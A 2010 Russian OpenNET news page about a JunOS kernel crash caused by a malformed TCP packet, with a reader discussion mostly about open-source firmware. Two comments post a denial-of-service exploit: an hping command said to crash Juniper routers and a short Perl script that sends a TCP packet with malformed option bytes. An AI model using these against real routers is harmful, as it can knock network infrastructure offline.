The OpenNET Project / Index page

[ новости /+++ | форум | wiki | теги | ]

Уязвимость в маршрутизаторах Juniper, приводящая к краху ядра JunOS

08.01.2010 20:48

Компания Juniper Networks объявила об обнаружении уязвимости в ядре операционной системы JunOS, под которой работают большинство маршрутизаторов Juniper. Посылка специально сформированного TCP пакета (с неправильно оформленной заглавной частью) на открытый порт самого маршрутизатора вызывает крах ядра, ведущий за собой рестарт устройства. Встроенный межсетевой экран не в состоянии "поймать" и изолировать такой пакет.

Проблеме подвержены почти все версии JunOS, начиная с 5.3.5 p0-2 и заканчивая 9.0R1.1 (полный список приводится здесь). По словам Juniper Networks, проблема обнаружена самой компанией во время проверки на совместимость с оборудованием других производителей. Подробностей по поводу того каким образом должен быть сформирован пакет не сообщается. По неофициальным данным, обновление будет доступно в понедельник, 11 января.

  1. Главная ссылка к новости (http://praetorianprefect.com/a...)
Автор новости: Mr. Mistoffelees
Тип: Проблемы безопасности
Короткая ссылка: https://opennet.ru/24941-Juniper
Ключевые слова: Juniper, security
При перепечатке указание ссылки на opennet.ru обязательно
Обсуждение (32) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, Аноним (-), 22:40, 08/01/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    С учетом того, что в JunOS используется код FreeBSD, нет ли подобной дыры в других *BSD системах ?
     
     
  • 2.2, Hety (??), 22:53, 08/01/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Фряшный код используется не во всех подсистемах. Деталей не помню, но есть вероятность, что сетевая как раз своя. Или, как минимум, была обработана напильником.
     

  • 1.3, chemtech (?), 10:54, 09/01/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Была бы свободная прошивка, накатил патч, а тут ждать когда они обновят прошивку и не факт что еще все дыры залатали...
     
     
  • 2.5, Lindemidux (??), 15:52, 09/01/2010 [^] [^^] [^^^] [ответить]  
  • +/
    У d-link свободная прошивка, попробуй накатай патч.
     
     
  • 3.6, User294 (ok), 16:40, 09/01/2010 [^] [^^] [^^^] [ответить]  
  • –2 +/
    >У d-link свободная прошивка, попробуй накатай патч.

    У меня именно таким манером в свое время был Д-линк ... с прошивкой от сторонних авторов (McMcc). Да и на ряд длинков с эзернетом нынче подходят прошивки "от Олега". Кстати вполне обычна ситуация когда дыры и назойливые баги (вплоть до ляпов не позволяющих юзать девайс в нужной конфигурации вообще, как это бывало с типовой для России связкой DHCP+PPTP например) в сторонних прошивках фиксятся шибко быстрее чем раздуплятся вендоры. И это большой плюс опенсорсных прошивок. Можно сосать месяцами, менять два десятка девайсов, прыгать с бубном и прочая. А можно влить фирмваре от местных спецов, которые в вопросе разбираются и в курсе "национальных особенностей" и через 10 минут все будет работать. Лучше чем оригинал, как правило. Ну да, бздунам с их всеобщим счастьем для закрывателей сорсов такое ессно не светит. Пусть наслаждаются своими блобами и тотальной зависимостью от вендора с невозможностью без большого траха исправить самолично жалкие пару байтов чтобы исправить какую-то вот такую вот хрень.

     
     
  • 4.10, arachnid (??), 22:13, 09/01/2010 [^] [^^] [^^^] [ответить]  
  • –2 +/
    осподи, опять крышу снесло от букв bsd?

    ps. а что делать, если не будет очередного Олега, а юзер? ты сам готов прошивку писать?
    а то вот например сейчас очень популяы насы на линухе, а вот прошивок для них как-то тухло. чего бы не приложиться?

     
     
  • 5.11, vitek (??), 00:37, 10/01/2010 [^] [^^] [^^^] [ответить]  
  • +/
    а его уже как полтора года нет.
    нашлись другие - http://code.google.com/p/wl500g/
    проблем то. там то его собрать, что бзишнегу мир.
    >а то вот например сейчас очень популяы насы на линухе, а вот прошивок для них как-то тухло. чего бы не приложиться?

    давай насу. приложусь.

    зы:
    крышу то держи. а то с выдувает всё то из под неё то.

     
     
  • 6.13, arachnid (ok), 15:54, 10/01/2010 [^] [^^] [^^^] [ответить]  
  • +/
    >а его уже как полтора года нет.
    >нашлись другие - http://code.google.com/p/wl500g/
    >проблем то. там то его собрать, что бзишнегу мир.
    >>а то вот например сейчас очень популяы насы на линухе, а вот прошивок для них как-то тухло. чего бы не приложиться?
    >
    >давай насу. приложусь.
    >
    >зы:
    >крышу то держи. а то с выдувает всё то из под неё
    >то.

    идешь на сайт интела и берешь прошивку. все просто. правда энтузиастам пока почему то не удалось сделать свою.

    http://www.intel.com/support/ru/motherboards/server/ss4000-e/ - вот оно. как то пока "Олега" на это устройство не наблюдается.

    а что касаемо крыши - так я же не бегаю по топикам, где светятся буквы gpl и не поливаю говном ее использующих.

     
     
  • 7.16, User294 (ok), 20:55, 10/01/2010 [^] [^^] [^^^] [ответить]  
  • +/
    А в чем было поливание говном? Я констатировал факт что при наличии сорсов тупые баги зачастую чинятся локально куда быстрее чем пока там снимется с тормоза вендор. Это теперь уже считается за поливание говном? Да вы совсем уж с дуба рухнули с вашим фанатизмом. Ну да, конечно, орать про свободу на форуме - это одно, а починить тупой баг в фирмваре по быстренькому - другое. Как по мне - предпочитаю фактическую свободу вместо громких деклараций о всеобщем счастье.
     
  • 7.29, boykov (ok), 17:57, 18/01/2010 [^] [^^] [^^^] [ответить]  
  • +/
    >
    >идешь на сайт интела и берешь прошивку. все просто. правда энтузиастам пока
    >почему то не удалось сделать свою.
    >
    >http://www.intel.com/support/ru/motherboards/server/ss4000-e/ - вот оно. как то пока "Олега" на это устройство не
    >наблюдается.
    >

    а оно надо этому девайсу?
    с вайфаем -- была острая необходимость. здесь то что?

     
     
  • 8.32, arachnid (ok), 08:19, 19/01/2010 [^] [^^] [^^^] [ответить]  
  • +/
    а здесь - потрясающе низкая скорость работы сетевого накопителя ... текст свёрнут, показать
     
  • 5.14, User294 (ok), 20:42, 10/01/2010 [^] [^^] [^^^] [ответить]  
  • +/
    > ps. а что делать, если не будет очередного Олега, а юзер? ты сам готов прошивку писать?

    Я осваиваю OpenWRT и связанные с ним околосистемные дела. Весьма осмысленная такая штука - как раз для создания на его основе своих прошивок под свои вкусы и цели. Мне нравится. И с нуля ничего писать не надо, в общем то. Велосипедостроение - удел проприетарщиков и жлобов. Базовых платформ - не так уж и много и какая-никакая поддержка оных уже вколупана. Да, ессно мне до высот как у матерых системщиков пока далековато. Но в конце концов не боги горшки обжигают. Предпочитаю учиться что-то делать сам чем подлизывать "божкам" из [тут проприетарная контора по вкусу] в надежде на их милость. Попробовав и так и сяк пришел к выводу что так мне нравится больше.

    > а вот прошивок для них как-то тухло. чего бы не приложиться?

    Ну, кому интересно это направлене - в своем праве поприкладываться. Я пока подсел на OpenWRT, а это все-таки не NAS. Да и где-то на уровне интуиции понятно что NAS как класс soho девайсов вероятно умрет - ИМХО интеграция в SOHO вскоре вгонит все в 1 универсальный девайс вида "роутер + wi-fi + HDD". Как в свое время умерли КПК в пользу более интегренных коммуникаторов. Если Marvell запозиционирует свои процы как платформу для роутерообразных штук и у меня будет такая железяка - я с удовольствием с ней покопаютсь. А в данный момент мне и так есть где приложиться.

     
     
  • 6.18, arachnid (ok), 21:52, 10/01/2010 [^] [^^] [^^^] [ответить]  
  • +/
    "Ну да, бздунам с их всеобщим счастьем для закрывателей сорсов такое ессно не светит" - то есть это взвешенный и аргументированный коммент?

     
     
  • 7.19, User294 (ok), 22:28, 10/01/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Да, кой-в чем вы правы: надо стараться избегать таких оборотов провоцирующих на колкости в ответ. Однако со своей стороны замечу что меня интересуют технические моменты а не кидание какашками и выяснение какие козлы собеседники. И вот в этом плане я что-то внятных контр-аргументов не вижу.Зато рассказать мне какой я козел - это всегда пожалуйста.
     
     
  • 8.20, arachnid (ok), 23:30, 10/01/2010 [^] [^^] [^^^] [ответить]  
  • +/
    ну я бы сказал, что подобная реакция заслуженна определенным поведением, разве н... текст свёрнут, показать
     
     
  • 9.30, User294 (ok), 18:30, 18/01/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Как Да, вот только для длинков и асусов всяких, с их GPL - желающие сами могут ... текст свёрнут, показать
     
     
  • 10.33, arachnid (ok), 08:38, 19/01/2010 [^] [^^] [^^^] [ответить]  
  • +/
    как заслуженна еще раз отрывок из коммента выше напомнить то устройство, н... большой текст свёрнут, показать
     
  • 6.22, Юрий (??), 05:22, 11/01/2010 [^] [^^] [^^^] [ответить]  
  • +/
    >Если Marvell запозиционирует
    >свои процы как платформу для роутерообразных штук и у меня будет
    >такая железяка - я с удовольствием с ней покопаютсь. А в
    >данный момент мне и так есть где приложиться.

    Так покопайтесь с Time Capsule - внутри 100% Marvell


     
     
  • 7.31, User294 (ok), 18:42, 18/01/2010 [^] [^^] [^^^] [ответить]  
  • +/
    >Так покопайтесь с Time Capsule - внутри 100% Marvell

    Это чего-то яббловское как я понял? От продукции яббла я предпочитаю держаться подальше, слишком уж противный и ограничительный вендор, даже хуже MS имхо, т.к. задранные цены + в их железках всегда найдется какая-то пакость которая отравит удовольствие от обладания девайсом. Да и если у вас нет мака (а мне и без него хорошо) - яббловские железки обычно не слишком ориентированы на всех остальных. Вот если несколько более-менее нейтральных вендоров начнут юзать платформу для роутеров, я к ней присмотрюсь, факт.

    P.S. а вообще, честное пионерское, мне есть с чем поковыряться в свое удовольствие и я в состоянии выбрать себе предметы ковыряния сам. Без всяких ябблов на горизонте.

     
  • 4.28, анон (?), 08:29, 15/01/2010 [^] [^^] [^^^] [ответить]  
  • +1 +/
    йо. ваше маниакальное стремление пересадить всех на опенсорц напоминает РМС. хотите использовать в ядре сети железку с прошивкой "от олега" - ваше дурное право. но пропагандировать свою дурь это уж через чур. да, кстати. сетевые железки - большой бизнес. а в бизнесе не будет ничего открытого, ибо конкуренция и коммерческая тайна.
     
  • 3.8, Ъ (?), 19:58, 09/01/2010 [^] [^^] [^^^] [ответить]  
  • +/
    >У d-link свободная прошивка

    В каком месте? ftp://dlink.ru/pub/  как-то не на что не наблюдается.
      

     
     
  • 4.15, User294 (ok), 20:45, 10/01/2010 [^] [^^] [^^^] [ответить]  
  • +/
    А в ftp://dlink.ru/pub/ADSL/GPL_source_code/ интересно чего? :)
    А так - да, некоторые типа длинка довольно раздолбайски относятся к выкладыванию сорсов. Потому то и есть всякие GPLviolations.org :)
     

  • 1.4, cvsup (ok), 13:56, 09/01/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    Видео:
    http://praetorianprefect.com/archives/2010/01/junos-juniper-kernel-crash-vide
     
  • 1.7, аноним (?), 19:02, 09/01/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    да. Ынтерпрайз баги, классика... классика, конечно, пинг смерти, но и это сойдёт
     
  • 1.9, XoRe (ok), 21:53, 09/01/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    >Подробностей по поводу того каким образом должен быть сформирован пакет
    >не сообщается.

    Можно попробовать подойти к вопросу с точки зрения комбинаторики.
    Нагенерить 2 в степени n пакетов и поотсылать их устройству.
    На каком пакете упадет, тот левый)

     
     
  • 2.17, User294 (ok), 21:03, 10/01/2010 [^] [^^] [^^^] [ответить]  
  • +/
    А чему равно n? А то скажем 2^128 пакетоы вы обломитесь послать пожалуй :)
     

  • 1.12, vgray (??), 10:38, 10/01/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    посмотрел видео, попробовал. там в описании ошибка небольшая. но все работает
    hping -c 1 -p 23 -L 0 -M 0 192.168.10.210 -S -E ./jun/1012 -d 10 -O 7
    убивает 9й джун наповал.


                          

     
  • 1.21, Аноним (-), 04:23, 11/01/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    А можно содержимое файлика /jun/1012. Всё равно 23-й порт закрыт от обычных пользователей.
     
     
  • 2.23, vgray (??), 05:34, 11/01/2010 [^] [^^] [^^^] [ответить]  
  • +/
    >А можно содержимое файлика /jun/1012. Всё равно 23-й порт закрыт от обычных
    >пользователей.

    увы не скажу, так как даже если порт закрыт ACL то все равно джунипер валится. Попробуйте почитать исходную новость и попробовать самим подобрать содержимое файла

     

  • 1.24, Аноним (-), 07:11, 11/01/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Ясно. Тогда я не оценил масштабов трагедии.
     
  • 1.25, Аноним (-), 08:55, 11/01/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Если не сложно можно связаться с Вами для уточнения содержимого пакета, так как подбор не помог и Жунипер не отреагировал, встает вопрос версия не восприимчива или просто не правильно сформирован пакет?
     
  • 1.27, luzers (?), 14:27, 11/01/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    #!/usr/bin/perl

    my $host = shift;
    my $port = shift;

    use Net::Packet qw($Env);

    use Net::Packet::IPv4;
    my $ip = Net::Packet::IPv4->new(dst => $host);

    use Net::Packet::TCP;

    my $tcp = Net::Packet::TCP->new(
    dst => $port,
    options => "\x65\x02\x01\x01",
    );

    use Net::Packet::Frame;
    my $frame = Net::Packet::Frame->new(l3 => $ip, l4 => $tcp);

    $frame->send;
    exit 0;

     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Спонсоры:
    Inferno Solutions
    Ideco
    A-Real
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2021 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру